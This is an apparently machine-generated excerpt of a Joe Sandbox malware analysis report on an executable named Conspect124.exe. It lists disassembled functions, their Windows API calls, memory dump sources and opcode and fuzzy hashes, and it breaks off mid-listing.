                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                      • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                      • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                      • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                      Function 23BC5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 23BC536F
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC5381
                                      • _free.LIBCMT ref: 23BC5394
                                      • _free.LIBCMT ref: 23BC53A5
                                      • _free.LIBCMT ref: 23BC53B6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 9e5afa12b39b7a83b922c4a6ef2c70dbd19b5ab297d5b317b57d56825376b458
                                      • Instruction ID: 9eb2e8a0daf7b7b27fc5b4920cac599aa4a24962ec31ab3712b8049aaa369604
                                      • Opcode Fuzzy Hash: 9e5afa12b39b7a83b922c4a6ef2c70dbd19b5ab297d5b317b57d56825376b458
                                      • Instruction Fuzzy Hash: 4FF0BBB091026CDFC625FF2687604093FB5FF39A143050697F81C97612DB7885618B80
                                      Function 23BC4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Conspect124.exe,00000104), ref: 23BC4C1D
                                      • _free.LIBCMT ref: 23BC4CE8
                                      • _free.LIBCMT ref: 23BC4CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                      • API String ID: 2506810119-1799583490
                                      • Opcode ID: f343b8d06a47ded78f6934ef829f20e748ef2baf397ba780765485eb4bb15aa9
                                      • Instruction ID: df625b2140f3de3059c94e36df30e6811717df97cc54af660d7e46f66f9a7e75
                                      • Opcode Fuzzy Hash: f343b8d06a47ded78f6934ef829f20e748ef2baf397ba780765485eb4bb15aa9
                                      • Instruction Fuzzy Hash: B6311E71B00398AFD732DF998980D9FBBB8EB99710F1444B6E90497221D6758F41CB50
                                      Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                      • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                      Function 23BC86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23BC6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 23BC8731
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 23BC87BA
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 23BC87CC
                                      • __freea.LIBCMT ref: 23BC87D5
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: c8e60b3d7cb76b5faf6224ed4b5f4b334bc2d744aa35824a2cd2023d5a5afbeb
                                      • Instruction ID: 6eb182ed157a26209349c01cd130beeb6b0ccdf647f1cdcb93cbd4fbf41dc9c7
                                      • Opcode Fuzzy Hash: c8e60b3d7cb76b5faf6224ed4b5f4b334bc2d744aa35824a2cd2023d5a5afbeb
                                      • Instruction Fuzzy Hash: 1B319C32A0129AAFDF35DF65CC80EAF7BA6EB54610F0509BAED04DB160E735D950CB90
                                      Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Close$Enum
                                      • String ID:
                                      • API String ID: 464197530-0
                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                      Function 23BC5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23BC1D66,00000000,00000000,?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue), ref: 23BC5D13
                                      • GetLastError.KERNEL32(?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue,23BCE190,FlsSetValue,00000000,00000364,?,23BC5BC8), ref: 23BC5D1F
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23BC5C88,23BC1D66,00000000,00000000,00000000,?,23BC5E85,00000006,FlsSetValue,23BCE190,FlsSetValue,00000000), ref: 23BC5D2D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 2f526f5665f61dc4e4bf2d230a1ed2a93847ad8eda551d9d677324faeead1fc9
                                      • Instruction ID: 5f831e06b2bc9280ee5bf921715acdfb5f761e0a0a565e9759d66f583f1c60f0
                                      • Opcode Fuzzy Hash: 2f526f5665f61dc4e4bf2d230a1ed2a93847ad8eda551d9d677324faeead1fc9
                                      • Instruction Fuzzy Hash: 5D01D8367113666FC331AE6A8C68E467758EF456A1F140E76F909D7541D724D801C6E0
                                      Function 0040577F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                      • GetLastError.KERNEL32 ref: 004057D6
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                      • GetLastError.KERNEL32 ref: 004057F5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID:
                                      • API String ID: 3449924974-0
                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                      Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                      • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                      Function 23BC16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: : $Se.
                                      • API String ID: 4218353326-4089948878
                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction ID: 843643f636dea84d50bd98d50b14d6c5707db49d646f9a930a0a08cd90b5d875
                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                      • Instruction Fuzzy Hash: 83110AB5A00388AECB21DFACD840BDDFBFCEF29204F5444A6E545E7212E6705B02C765
                                      Function 23BC1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23BC2903
                                        • Part of subcall function 23BC35D2: RaiseException.KERNEL32(?,?,?,23BC2925,00000000,00000000,00000000,?,?,?,?,?,23BC2925,?,23BD21B8), ref: 23BC3632
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23BC2920
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: a4aabe0a7d5fe7ad58c14d681b6302348a9b93667140110b1e22bdb04063d45f
                                      • Instruction ID: 0c995c4a4423faba0367bc929b19e39f2cde8215bf146f9922aff4de5c85dc9b
                                      • Opcode Fuzzy Hash: a4aabe0a7d5fe7ad58c14d681b6302348a9b93667140110b1e22bdb04063d45f
                                      • Instruction Fuzzy Hash: 24F0A434E1038C7FCF34FEA4EC44959776CAF14A50F904DF1AA249E0A1EB71EA158595
                                      Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00405253
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                      • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                      Function 00405D6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405D8B
                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040333B,00437000,00437800,00437800,00437800,00437800,00437800,74DF3420,00403589), ref: 00405DA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                      Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                      • CloseHandle.KERNEL32(?), ref: 00405867
                                      Strings
                                      • Error launching installer, xrefs: 00405844
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                      • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                      Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                      • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                      Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                      • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                      • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                      Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                      • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                      Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
